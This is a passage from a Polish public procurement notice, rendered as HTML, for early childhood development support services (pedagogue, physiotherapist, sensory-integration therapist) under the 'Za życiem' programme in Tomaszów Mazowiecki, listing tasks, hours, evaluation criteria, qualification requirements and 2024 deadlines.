zajęć wczesnego wspomagania rozwoju dziecka przez Pedagoga<br/><br/>Do zadań pedagoga należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla pedagoga,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla pedagoga,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/>i uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),,<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI XI: w 2024 roku - max. 506 godzin (pięćset sześć godzin). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ XIII – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Fizjoterapeutę/Rehabilitanta<br/><br/>Do zadań fizjoterapeuty/rehabilitanta należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się <br/>na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla fizjoterapeuty/rehabilitanta,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla fizjoterapeuty/rehabilitanta,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/>i uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI XIII: w 2024 roku - max. 298 godzin (dwieście dziewięćdziesiąt osiem godzin). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ XVII – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Terapeutę Integracji Sensorycznej<br/><br/>Do zadań terapeuty integracji sensorycznej należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się <br/>na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla terapeuty integracji sensorycznej,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla terapeuty integracji sensorycznej,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/> uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI XVII: w 2024 roku - max. 764 godziny (siedemset sześćdziesiąt cztery godziny). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ XVIII – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Terapeutę Integracji Sensorycznej<br/><br/>Do zadań terapeuty integracji sensorycznej należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się <br/>na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla terapeuty integracji sensorycznej,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla terapeuty integracji sensorycznej,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/> uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI XVIII: w 2024 roku - max. 352 godziny (trzysta pięćdziesiąt dwie godziny). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna<br/>i zawodowa<br/>Skierowanie do realizacji zamówienia osób tj.:<br/>DOTYCZY CZĘŚCI NR III ZAMÓWIENIA<br/>Logopeda<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	kwalifikacje zgodne z Rozporządzeniem MEN z 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone studia wyższe magisterskie w zakresie logopedii lub studia wyższe magisterskie w zakresie pedagogiki oraz studia podyplomowe w zakresie logopedii,<br/>4.	co najmniej 2 lata doświadczenia w pracy z dzieckiem <br/>z niepełnosprawnym.<br/>DOTYCZY CZĘŚCI NR VI ZAMÓWIENIA<br/>Logopeda<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	kwalifikacje zgodne z Rozporządzeniem MEN z 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone studia wyższe magisterskie w zakresie logopedii lub studia wyższe magisterskie w zakresie pedagogiki oraz studia podyplomowe w zakresie logopedii,<br/>4.	co najmniej 2 lata doświadczenia w pracy z dzieckiem <br/>z niepełnosprawnym.<br/><br/>DOTYCZY CZĘŚCI NR X ZAMÓWIENIA pedagog<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	kwalifikacje zgodne z Rozporządzeniem MEN z 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone jednolite studia magisterskie na kierunku pedagogika lub kurs kwalifikacyjny w zakresie oligofrenopedagogiki lub studia podyplomowe w zakresie pedagogiki specjalnej.<br/>4.	co najmniej 2 lata doświadczenia w pracy z dzieckiem <br/>z niepełnosprawnym.<br/><br/>DOTYCZY CZĘŚCI NR XI ZAMÓWIENIA pedagog<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	kwalifikacje zgodne z Rozporządzeniem MEN z 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone jednolite studia magisterskie na kierunku pedagogika lub kurs kwalifikacyjny w zakresie oligofrenopedagogiki lub studia podyplomowe w zakresie pedagogiki specjalnej.<br/>4.	co najmniej 2 lata doświadczenia w pracy z dzieckiem <br/>z niepełnosprawnym.<br/><br/>DOTYCZY CZĘŚCI NR XIII ZAMÓWIENIA fizjoterapeuta/rehabilitant<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	Studia wyższe magisterskie w zakresie fizjoterapii/rehabilitacji lub Medyczne Studium Zawodowe w zawodzie technik fizjoterapii,<br/>3.	co najmniej 2 lata doświadczenia w pracy z dzieckiem <br/>niepełnosprawnym.<br/><br/><br/>DOTYCZY CZĘŚCI NR XVII ZAMÓWIENIA terapeuta integracji sensorycznej<br/>1.	Minimum 1 osoba posiadająca:<br/>2.	posiada przygotowanie pedagogiczne uzyskane zgodnie <br/>z Rozporządzeniem MEN z 14 września 2023 r. <br/>w sprawie szczegółowych kwalifikacji wymaganych <br/>od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone jednolite studia magisterskie na kierunku pedagogika lub studia podyplomowe w zakresie integracji sensorycznej,<br/>4.	co najmniej 2-letnie doświadczenie w pracy z dzieckiem niepełnosprawnym.<br/><br/>DOTYCZY CZĘŚCI NR XVIII ZAMÓWIENIA terapeuta integracji sensorycznej<br/>1.	Minimum a osoba posiadająca:<br/>2.	posiada przygotowanie pedagogiczne uzyskane zgodnie <br/>z Rozporządzeniem MEN z 14 września 2023 r. <br/>w sprawie szczegółowych kwalifikacji wymaganych <br/>od nauczycieli (Dz. U. 2023 poz. 2102),<br/>3.	ukończone jednolite studia magisterskie na kierunku pedagogika lub studia podyplomowe w zakresie integracji sensorycznej,<br/>4.	co najmniej 2-letnie doświadczenie w pracy z dzieckiem niepełnosprawnym.<br/><br/><br/>Zamawiający będzie wstępnie oceniał spełnienie powyższych warunków udziału w postępowaniu na podstawie oświadczenia <br/>o spełnieniu warunków udziału w postepowaniu złożonego <br/>do oferty Wykonawcy, który na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Załącznik nr 4 do SWZ Oświadczenie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 1 do SWZ – w odniesieniu do warunku określonego w Rozdziale X Lp. 4 SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w Rozdziale XVI pkt. 1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w Rozdziale XVI pkt. 5 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w Rozdziale XVI pkt. 5 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności z uwzględnieniem zakazu określonego w art. 454 ust. 1 ustawy pzp.<br/>2. Zamawiający zgodnie z art. 455 ust. 1 pkt 1 ustawy pzp przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy - w formie aneksu - w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia:<br/>1) zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie Przedmiotu zamówienia;<br/>2) zmiany wynagrodzenia z powodu zmian urzędowo obowiązującej stawki podatku od towarów i usług (VAT);<br/>3) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację Przedmiotu zamówienia lub świadczenia stron Umowy;<br/>4) zmiany ilości godzin Przedmiotu zamówienia,<br/>5) możliwość zmiany osób, wykonujących Przedmiot zamówienia umowy gdy: kwalifikacje wskazanej nowej osoby będą takie same lub wyższe, po złożeniu przez Wykonawcę dokumentów potwierdzających posiadanie stosownych kwalifikacji i akceptacji Zamawiającego;<br/>6) gdy wystąpią obiektywne przeszkody uniemożliwiające realizację Przedmiotu zamówienia, w szczególności np. choroba prowadzącego, długotrwała niezdolność do pracy prowadzącego, śmierć prowadzącego, ogłoszone stany epidemiologiczne, pandemia lub inne stany nadzwyczajne, które wystąpią po dniu zawarcia umowy bądź będą konsekwencją wprowadzenia powyższych;<br/>7) zmiany sposobu rozliczenia finansowego z wykonawcą.<br/>3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>4. Nie stanowi istotnej zmiany umowy zmiana danych teleadresowych oraz osób wskazanych do kontaktów między stronami umowy.<br/>5. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej i podpisania przez obydwie strony umowy.<br/>6. Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak i Zamawiający. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać poprzez platformę e-zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-15 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa zamówienia: Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju w ramach rządowego programu kompleksowego wsparcia dla rodzin „Za życiem” w celu zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2024.<br/><br/>1. Przedmiotem zamówienia jest:<br/>Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego<br/>wspomagania rozwoju dziecka w ramach rządowego programu „Za Życiem” w celu zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w 